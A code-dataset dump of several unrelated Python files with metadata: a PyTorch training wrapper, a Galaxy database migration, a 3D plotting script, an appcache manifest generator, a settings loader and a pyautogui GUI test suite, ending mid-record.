network on batches of data generated from `generator`\n\n :param generator: a generator yielding batches indefinitely, where each\n batch is a tuple of (inputs, targets)\n :type generator: generator\n :param n_steps: number of batches to evaluate on\n :type n_steps: int\n :return: scalar test loss\n :rtype: float\n \"\"\"\n\n self._assert_compiled()\n\n if self.device:\n self.network.to(self.device)\n\n total_loss = 0\n n_obs = 0\n for _ in range(n_steps):\n inputs, targets = next(generator)\n n_obs += inputs.shape[0]\n\n loss = self.test_on_batch(inputs, targets)\n total_loss += loss\n\n return total_loss / n_obs\n\n def fit_generator(self, generator, n_steps_per_epoch, n_epochs=1,\n validation_data=None, n_validation_steps=None):\n \"\"\"Train the network on batches of data generated from `generator`\n\n :param generator: a generator yielding batches indefinitely, where each\n batch is a tuple of (inputs, targets)\n :type generator: generator\n :param n_steps_per_epoch: number of batches to train on in one epoch\n :type n_steps_per_epoch: int\n :param n_epochs: number of epochs to train the model\n :type n_epochs: int\n :param validation_data: generator yielding batches to evaluate the loss\n on at the end of each epoch, where each batch is a tuple of (inputs,\n targets)\n :type validation_data: generator\n :param n_validation_steps: number of batches to evaluate on from\n `validation_data`\n :raises RuntimeError: if only one of `validation_data` and\n `n_validation_steps` are passed in\n \"\"\"\n\n default_callbacks = self._default_callbacks()\n callbacks = CallbackList(default_callbacks)\n\n self._assert_compiled()\n\n invalid_inputs = (\n (validation_data is not None and n_validation_steps is None) or\n (n_validation_steps is not None and validation_data is None)\n )\n if invalid_inputs:\n msg = (\n '`validation_data` and `n_validation_steps` must both be '\n 'passed, or neither.'\n )\n raise RuntimeError(msg)\n\n if self.device:\n self.network.to(self.device)\n\n callbacks.set_params({\n 'epochs': n_epochs,\n 'metrics': ['loss', 'val_loss'],\n 'steps': n_steps_per_epoch,\n 'verbose': True\n })\n callbacks.set_model(self)\n\n callbacks.on_train_begin()\n for idx_epoch in range(n_epochs):\n if self.stop_training:\n break\n\n epoch_logs = {}\n callbacks.on_epoch_begin(idx_epoch)\n\n for idx_batch in range(n_steps_per_epoch):\n batch_logs = {'batch': idx_batch, 'size': 1}\n callbacks.on_batch_begin(idx_batch, batch_logs)\n\n inputs, targets = next(generator)\n loss = self.train_on_batch(inputs, targets)\n\n batch_logs['loss'] = loss\n callbacks.on_batch_end(idx_batch, batch_logs)\n\n if self.stop_training:\n break\n\n if validation_data:\n val_loss = self.evaluate_generator(\n validation_data, n_validation_steps\n )\n epoch_logs['val_loss'] = val_loss\n callbacks.on_epoch_end(idx_epoch, epoch_logs)\n callbacks.on_train_end()\n\n def load_weights(self, fpath_weights):\n \"\"\"Loads all layer weights from the provided `fpath_weights`\n\n :param fpath_weights: fpath_weights to load the model from\n :type fpath_weights: str\n \"\"\"\n\n self.network.load_state_dict(torch.load(fpath_weights))\n\n def save_weights(self, fpath_weights, overwrite=True):\n \"\"\"Dumps all layers and weights to the provided `fpath_weights`\n\n The weights can be loaded into a `Model` with the same topology using\n the `Model.load_weights` method.\n\n :param fpath_weights: fpath_weights to save the model to\n :type fpath_weights: str\n :param overwrite: overwrite an existing file at `fpath_weights`\n (if present); only True is currently supported\n :type overwrite: bool\n \"\"\"\n\n assert overwrite, '`overwrite=False` is not supported!'\n torch.save(self.network.state_dict(), fpath_weights)\n\n def test_on_batch(self, inputs, targets):\n \"\"\"Evaluate the model on a single batch of samples\n\n :param inputs: inputs to predict on\n :type inputs: torch.Tensor\n :param targets: targets to compare model predictions to\n :type targets: torch.Tensor\n :return: scalar test loss\n :rtype: float\n \"\"\"\n\n self._assert_compiled()\n\n self.network.train(mode=False)\n if self.device:\n inputs = inputs.to(self.device)\n targets = targets.to(self.device)\n\n outputs = self.network(inputs)\n loss = self.loss(outputs, targets)\n\n return loss.tolist()\n\n def train_on_batch(self, inputs, targets):\n \"\"\"Run a single forward / backward pass on a single batch of data\n\n :param inputs: inputs to use in the forward / backward pass\n :type inputs: torch.Tensor\n :param targets: targets to use in the forward / backward pass\n :type targets: torch.Tensor\n :return: scalar training loss\n :rtype: float\n \"\"\"\n\n self._assert_compiled()\n\n self.network.train(mode=True)\n if self.device:\n inputs = inputs.to(self.device)\n targets = targets.to(self.device)\n\n outputs = self.network(inputs)\n loss = self.loss(outputs, targets)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n return loss.tolist()\n", "sub_path": "dl_playground/training/pytorch/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 9519, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "tensorflow.python.keras.callbacks.History", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.callbacks.BaseLogger", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.callbacks.ProgbarLogger", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 89, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.python.keras.callbacks.CallbackList", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 222, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 238, "usage_type": "call"}]}
+{"seq_id": "612132259", "text": "\"\"\"\nMigration script to create the genome_index_tool_data table.\n\"\"\"\n\nimport datetime\nimport logging\n\nfrom sqlalchemy import (\n Column,\n DateTime,\n ForeignKey,\n Integer,\n MetaData,\n String,\n Table\n)\n\nfrom galaxy.model.migrate.versions.util import (\n create_table,\n drop_table\n)\n\nlog = logging.getLogger(__name__)\nnow = datetime.datetime.utcnow\nmetadata = MetaData()\n\nGenomeIndexToolData_table = Table(\"genome_index_tool_data\", metadata,\n Column(\"id\", Integer, primary_key=True),\n Column(\"job_id\", Integer, ForeignKey(\"job.id\"), index=True),\n Column(\"dataset_id\", Integer, ForeignKey(\"dataset.id\"), index=True),\n Column(\"deferred_job_id\", Integer, ForeignKey(\"deferred_job.id\"), index=True),\n Column(\"transfer_job_id\", Integer, ForeignKey(\"transfer_job.id\"), index=True),\n Column(\"fasta_path\", String(255)),\n Column(\"created_time\", DateTime, default=now),\n Column(\"modified_time\", DateTime, default=now, onupdate=now),\n Column(\"indexer\", String(64)),\n Column(\"user_id\", Integer, ForeignKey(\"galaxy_user.id\"), index=True))\n\n\ndef upgrade(migrate_engine):\n print(__doc__)\n metadata.bind = migrate_engine\n metadata.reflect()\n\n create_table(GenomeIndexToolData_table)\n\n\ndef downgrade(migrate_engine):\n metadata.bind = migrate_engine\n metadata.reflect()\n\n drop_table(GenomeIndexToolData_table)\n", "sub_path": "lib/galaxy/model/migrate/versions/0098_genome_index_tool_data_table.py", "file_name": "0098_genome_index_tool_data_table.py", "file_ext": "py", "file_size_in_byte": 1665, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sqlalchemy.MetaData", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 28, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 29, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 30, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 31, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 32, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 34, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 35, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 36, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 36, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 37, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 37, "usage_type": "call"}, {"api_name": "galaxy.model.migrate.versions.util.create_table", "line_number": 45, "usage_type": "call"}, {"api_name": "galaxy.model.migrate.versions.util.drop_table", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "110154889", "text": "\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfig = plt.figure()\n# syntax for 3-D projection\nax = plt.axes(projection='3d')\n# defining all 3 axes\nz = np.linspace(0, 1, 100)\nx = z**2\ny = z**3\n# plotting\nax.plot3D(x, y, z, 'r')\nax.set_title('3D line graph plotting')\nplt.show()", "sub_path": "3D_graph.py", "file_name": "3D_graph.py", "file_ext": "py", "file_size_in_byte": 282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}]}
+{"seq_id": "546758391", "text": "import re\nimport os\nimport datetime\n\nclass appCache(object):\n\t__modelString = \"CACHE MANIFEST\\n#%s:v3\\n\\n%s\\n\\n# All other resources (e.g. sites) require the user to be online.\\nNETWORK:\\n*\"\n\tdef __init__(self, path, name=\"appCacheFile\"):\n\t\tif os.path.isfile(path):\n\t\t\tself.path = path\n\t\t\tself.name = name\n\t\t\tself.dirname = os.path.dirname(path)\n\t\t\tself.fileAppCache = os.path.join(self.dirname, self.name + '.appcache')\n\t\telse:\n\t\t\traise Exception('Path doesn\\'t contain a valid file!')\n\n\tdef _readFile(self):\n\t\tif os.path.exists(self.path):\n\t\t\twith open(self.path) as file:\n\t\t\t\treaded = file.read()\n\t\t\treturn re.findall('href=[\\\"\\']([^\\'\\\"].*?\\.css)[\\'\\\"]', readed) + re.findall('src=[\\\"\\']([^\\'\\\"].*?\\.js)[\\'\\\"]', readed)\n\t\treturn False\n\n\tdef createAppCache(self):\n\t\tpathsString = self._readFile();\n\n\t\twith open(self.fileAppCache, 'w+') as file:\n\t\t\tfile.write(__modelString % (datetime.date.today(), pathsString))\n\n\tdef printAppCache(self):\n\t\tpathsString = \"\";\n\n\t\tfor item in self._readFile():\n\t\t\tpathsString += item + '\\n'\n\n\t\tfile.write(__modelString % (datetime.date.today(), pathsString))\n\nappcache = appCache('D:\\wwwroot\\QA\\MarketPlace.Web\\index.html', 'appMarketplace')\nappcache.createAppCache()\t", "sub_path": "appcache.py", "file_name": "appcache.py", "file_ext": "py", "file_size_in_byte": 1203, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.isfile", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 27, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 35, "usage_type": "attribute"}]}
+{"seq_id": "321218472", "text": "import json\n\nclass Settings:\n def __init__(self, defpath):\n with open(defpath,'r') as deffile:\n deff = json.load(deffile)\n self.dateformat = deff[\"meta\"][\"dateformat\"]\n self.delimiter = deff[\"meta\"][\"delimiter\"]\n self.encoding = deff[\"meta\"][\"encoding\"]\n self.locale = deff[\"meta\"][\"locale\"]\n self.accountName = deff[\"meta\"][\"accountName\"]\n self.header = int(deff[\"meta\"][\"header\"])\n self.date = int(deff[\"columns\"][\"date\"])\n self.amount = int(deff[\"columns\"][\"amount\"])\n self.memo = int(deff[\"columns\"][\"memo\"])\n self.payee = int(deff[\"columns\"][\"payee\"])\n", "sub_path": "Settings.py", "file_name": "Settings.py", "file_ext": "py", "file_size_in_byte": 729, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "json.load", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "245607824", "text": "\"\"\"\n The test file need to be run inside the gui_testing directory,\n with application centered on the (1920,1080) resolution main screen.\n The test cases are for the system testing, with the tests visulized.\n The test cases are testing the user story 1, mainly with the functionalities\n regarding:\n 1. add, delete, update client information; choose client to add equipments\n 2. add, delete equipments; choose equipment to add new run with a pair of CSVs\n 3. add, delete new run\n\n\"\"\"\n\nimport unittest\nimport os\nimport shutil\nfrom time import sleep\nimport pyautogui as pg\n\n# W0311: bad indentation; E1101:no-member; C0325: Unnecessary parens\n# pylint: disable=W0311, E1101, C0325\n\n# use the current directory, where the script exists\nCWD = os.path.dirname(os.path.realpath(__file__))\n\nclass TestUserStory1(unittest.TestCase):\n \"\"\"The user story 1 related system testing\n\n Args:\n unittest ([type]): [The default testing module from Python]\n \"\"\"\n @classmethod\n def setUpClass(self):\n \"\"\" Create or replace previous folder \"\"\"\n try:\n folder = os.getcwd() + \"\\\\US01 Fail\"\n shutil.rmtree(folder)\n except FileNotFoundError:\n print(\"[There's no such directory]\")\n\n try:\n folder = os.getcwd() + \"\\\\US01 Success\"\n shutil.rmtree(folder)\n except FileNotFoundError:\n print(\"[There's no such directory]\")\n\n try:\n folder = os.getcwd() + \"\\\\US01\"\n shutil.rmtree(folder)\n except FileNotFoundError:\n print(\"[There's no such directory]\")\n\n try:\n self.cwd = os.getcwd() # for printing the current directory\n # print(self.cwd)\n os.mkdir(\"US01\")\n os.chdir(\"US01\") # cd to the directory for saving screenshots\n self.storage = '%s/' % os.getcwd() # escape the cwd string\n except:\n print(\"[Something is wrong when creating the directory]\")\n\n @classmethod\n def tearDownClass(self):\n \"\"\" End the test, determine if tests succeed or fail\n Then, rename the folder.\n \"\"\"\n file_list = os.listdir()\n # print(file_list)\n # iterate through the filename string, if there's a keyword \"fail\", rename the folder\n for filename in file_list:\n if \"fail\" in filename:\n # print(\"Some tests failed\")\n os.chdir(\"..\")\n os.rename(\"US01\", \"US01 Fail\")\n return\n os.chdir(\"..\")\n os.rename(\"US01\", \"US01 Success\")\n # print(\"All tests passed\")\n\n def test_a_add_new_client(self):\n ''' add a new client '''\n try:\n # The pyautogui doesn't recognize the pop up window -> use the coordination\n btn_add_new_client = pg.locateOnScreen(\n os.path.join(CWD, 'screenshot' ,'main_win' ,'add_new_client.png'),\n grayscale=False, confidence=.9)\n\n pg.moveTo(btn_add_new_client)\n pg.click()\n except:\n print(\"[There's no such button matching the picture]\")\n raise\n # add a new client\n try:\n pg.moveTo(942, 464, 0.6) # cal number\n pg.click()\n pg.write(\"CAL00004\")\n\n pg.moveTo(942, 502, 0.6) # client name\n pg.click()\n pg.write(\"Test client name\")\n\n pg.moveTo(942, 540, 0.6) # address 1\n pg.click()\n pg.write(\"Test client address1\")\n\n pg.moveTo(942, 577, 0.6) # address 2\n pg.click()\n pg.write(\"Test client address2\")\n\n pg.moveTo(942, 634, 0.6)\n pg.click()\n except:\n print(\"[There's somthing wrong]\")\n # locate the picture to see whether it exists\n try:\n pg.locateOnScreen(os.path.join(CWD,'screenshot', 'main_win', 'cal_CAL0004.png'))\n # succeeds, screenshot the application\n try:\n pg.screenshot(\n os.path.join(CWD,'US01', 'test add_new_client success .png'),\n region=(520, 127, (1405-520), (870-127))\n )\n except:\n print(\"[Fail to locate the folder]\")\n except:\n print(\"[Fail to find the picture or add new client function fails]\")\n pg.screenshot(\n os.path.join(CWD,'US01', 'test add_new_client success .png'),\n region=(520, 127, (1405-520), (870-127))\n )\n raise\n\n def test_b_add_equipment(self):\n ''' add an equipment, the information show up on GUI screen correctly'''\n # choose a client to add an equipment\n try:\n pg.moveTo(632, 487, 0.7)\n pg.click()\n\n btn_choose_client = pg.locateOnScreen(\n os.path.join(CWD, 'screenshot' ,'main_win' ,'choose_client.png'),\n grayscale=False, confidence=.9)\n pg.moveTo(btn_choose_client)\n pg.click()\n except:\n print(\"[Fail to find the picture or choose function fails]\")\n raise\n\n # move to the button\n try:\n btn_add_new_equipment = pg.locateOnScreen(\n os.path.join(CWD, 'screenshot' ,'main_win_info' ,'info_add_new_equipment.png'),\n grayscale=False, confidence=.9)\n pg.moveTo(btn_add_new_equipment)\n pg.click()\n except:\n print(\"[Fail to find the picture or add new equipment function fails]\")\n raise\n # finishing adding the equipment\n try:\n pg.moveTo(947, 473, 0.7)\n pg.click()\n pg.write(\"1234\")\n\n pg.moveTo(999, 513, 0.7)\n pg.click()\n pg.write(\"test mode\")\n\n pg.moveTo(962, 540, 0.7) # submit\n pg.click()\n except:\n print(\"[Fail to find the picture or add new equipment function fails]\")\n raise\n\n try:\n pg.locateOnScreen(os.path.join(CWD, 'screenshot', 'main_win_info', 'info_id.png'))\n # print(result) # if successful, would print out the box area\n try:\n pg.screenshot(\n os.path.join(CWD,'US01', 'test add_new_equipemnt success .png'),\n region=(520, 127, (1405-520), (870-127))\n )\n except:\n print(\"[Fail to locate the folder]\")\n except:\n print(\"[Fail to find the picture or add new equipment function fails]\")\n pg.screenshot(\n os.path.join(CWD,'US01', 'test add_new_equipemnt fail .png'),\n region=(520, 127, (1405-520), (870-127))\n )\n raise\n\n def test_c_add_new_run(self):\n ''' add a pair of files to a run, timestamp marked, information on screen '''\n\n # check the equipment info correct or not\n try:\n pg.locateOnScreen(\n os.path.join(CWD, 'screenshot', 'main_win', 'cal_CAL0004.png'),\n grayscale=False,\n confidence = .7\n )\n except:\n raise(\"[CAL Number incorrect, or cannot locate the picture]\")\n try:\n pg.locateOnScreen(\n os.path.join(CWD, 'screenshot', 'main_win_info', 'info_client_name.png'),\n grayscale=False,\n confidence = .7\n )\n except:\n raise(\"[client name incorrect, or cannot locate the picture]\")\n try:\n pg.locateOnScreen(\n os.path.join(CWD, 'screenshot', 'main_win_info', 'info_serial.png'),\n grayscale=False,\n confidence = .7\n )\n except:\n raise(\"[serial number incorrect, or cannot locate the picture]\")\n try:\n pg.locateOnScreen(\n os.path.join(CWD, 'screenshot', 'main_win_info', 'info_id.png'),\n grayscale=False,\n confidence = .7\n )\n except:\n raise(\"[id incorrect, or cannot locate the picture]\")\n\n # if all data correctly shown on the form, choose an equipment to add new run\n try:\n pg.moveTo(604, 606, 0.7)\n pg.click()\n\n btn_choose_equipment = pg.locateOnScreen(\n os.path.join(CWD, 'screenshot' ,'main_win_info' ,'info_choose_equipment.png'),\n grayscale=False, confidence=.9)\n\n pg.moveTo(btn_choose_equipment)\n pg.click()\n except:\n print(\"[Fail to find the picture or choose equipment function fails]\")\n raise\n\n # go on testing the add new run functions\n try:\n btn_add_new_run = pg.locateOnScreen(\n os.path.join(CWD, 'screenshot', 'main_win_equip', 'equip_add_new_run.png'),\n grayscale=False,\n confidence = .9\n )\n\n pg.moveTo(btn_add_new_run)\n pg.click()\n except:\n raise(\"cannot locate the button add new run\")\n\n # check the submit is successful\n try:\n pg.moveTo(674, 470, 0.7) # client file\n pg.click()\n\n pg.moveTo(977, 560, 0.7) # file\n pg.click()\n\n pg.moveTo(1281, 912, 0.7) # open\n pg.click()\n\n pg.moveTo(669, 539, 0.7) # lab file\n pg.click()\n\n pg.moveTo(907, 589, 0.7) # file\n pg.click()\n\n pg.moveTo(1281, 912, 0.7)\n pg.click()\n\n pg.moveTo(967, 601, 0.7) #submit\n pg.click()\n\n pg.locateOnScreen(\n os.path.join(CWD, 'screenshot', 'main_win', 'cal_CAL0004.png'),\n grayscale=False,\n confidence = .7\n )\n try:\n pg.screenshot(\n os.path.join(CWD,'US01', 'test add_new_run success .png'),\n region=(520, 127, (1405-520), (870-127))\n )\n except:\n print(\"[Fail to locate the folder]\")\n except:\n pg.screenshot(\n os.path.join(CWD,'US01', 'test add_new_run fail .png'),\n region=(520, 127, (1405-520), (870-127))\n )\n raise(\"[CAL Number incorrect, or cannot locate the picture, or submit fails]\")\n\n def test_d_delete_run(self):\n ''' delete a run in the equipment page '''\n try:\n pg.moveTo(685, 568, 0.7) # row data\n pg.click()\n\n btn_del = pg.locateOnScreen(\n os.path.join(CWD, 'screenshot', 'main_win_equip', 'equip_del_run.png'),\n grayscale=False,\n confidence = .9\n )\n pg.moveTo(btn_del)\n pg.click()\n\n pg.moveTo(933, 534, 0.7) # confirm delete the run\n pg.click()\n\n # if cannot find the data id, meaning the data has been deleted successfully\n # directly screenshot the data id for scanning\n try:\n # data\n data_x = 543\n data_y = 555\n pg.screenshot(\n os.path.join(CWD, 'screenshot', 'main_win_equip', 'equip_data.png'),\n region=(\n data_x,\n data_y,\n (817 - data_x),\n (587 - data_y)\n )\n )\n # print(data)\n except:\n print(\"[Saving file failed]\")\n\n sleep(1) # prepare for picture locating\n try:\n data = pg.locateOnScreen(\n os.path.join(CWD, 'screenshot', 'main_win_equip', 'equip_data.png'),\n grayscale=False,\n )\n if data is None:\n print(\"[Data successfully deleted]\")\n sleep(1) # pop window image get screenshot\n pg.screenshot(\n os.path.join(CWD,'US01', 'test_delete_run success .png'),\n region=(520, 127, (1405-520), (870-127))\n )\n else:\n print(\"[Data deletion failed]\")\n pg.screenshot(\n os.path.join(CWD,'US01', 'test_delete_run fail .png'),\n region=(520, 127, (1405-520), (870-127))\n )\n except:\n print(\"[Fail to locate the filepath]\")\n\n except:\n pg.screenshot(\n os.path.join(CWD,'US01', 'test_delete_run fail .png'),\n region=(520, 127, (1405-520), (870-127))\n )\n raise(\"[Data deletion failed]\")\n\n def test_e_del_client(self):\n \"\"\"Return to homepage to delete a client\n \"\"\"\n try:\n btn_home = pg.locateOnScreen(\n os.path.join(CWD, 'screenshot', 'main_win_info', 'info_home.png'),\n grayscale=False,\n confidence = .8\n )\n pg.moveTo(btn_home)\n pg.click()\n sleep(1)\n except:\n raise(\"[Fail to find the picture or home function fails]\")\n\n try:\n pg.moveTo(669, 484, 0.7) # selecte one client\n pg.click()\n\n pg.moveTo(1235, 387, 0.7) # delete client button, fail to capture the picture\n pg.click()\n\n pg.moveTo(941, 533, 0.7)\n pg.click()\n except:\n raise(\"[Fail to find the picture delete function fails]\")\n\n sleep(1) # for the picture locating precision\n try:\n image = pg.locateOnScreen(\n os.path.join(CWD, 'screenshot', 'main_win', 'cal_CAL0004.png'),\n grayscale=False,\n confidence = .9\n )\n # if image cannot be found, it would be None; otherwise screenshot the failure\n if image is None:\n print(\"[The client has been deleted successfully]\")\n try:\n pg.screenshot(\n os.path.join(CWD,'US01', 'test_del_client success .png'),\n region=(520, 127, (1405-520), (870-127))\n )\n except:\n print(\"[Fail to locate the folder]\")\n else:\n print(\"[Fail to delete the client, or the picture detection fail]\")\n pg.screenshot(\n os.path.join(CWD,'US01', 'test_del_client fail .png'),\n region=(520, 127, (1405-520), (870-127))\n )\n except:\n print(\"[Fail to locate the filepath]\")\n\n# test the client update button -> manully, successful\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestUserStory1)\n unittest.TextTestRunner(verbosity=2).run(suite)\n", "sub_path": "gui_testing/test_US01.py", "file_name": "test_US01.py", "file_ext": "py", "file_size_in_byte": 12680, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 23, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 35, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 36, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 41, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 42, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 47, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 48, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 53, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 56, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 57, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 66, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 72, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 73, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 75, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 76, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 87, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 88, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 94, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 95, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 96, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 98, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 99, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 100, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 102, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 103, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 104, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 106, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 107, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 108, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 110, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 111, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 137, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 138, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 143, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 144, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 154, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 155, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 161, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 162, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 163, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 165, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 166, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 167, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 169, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 170, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": 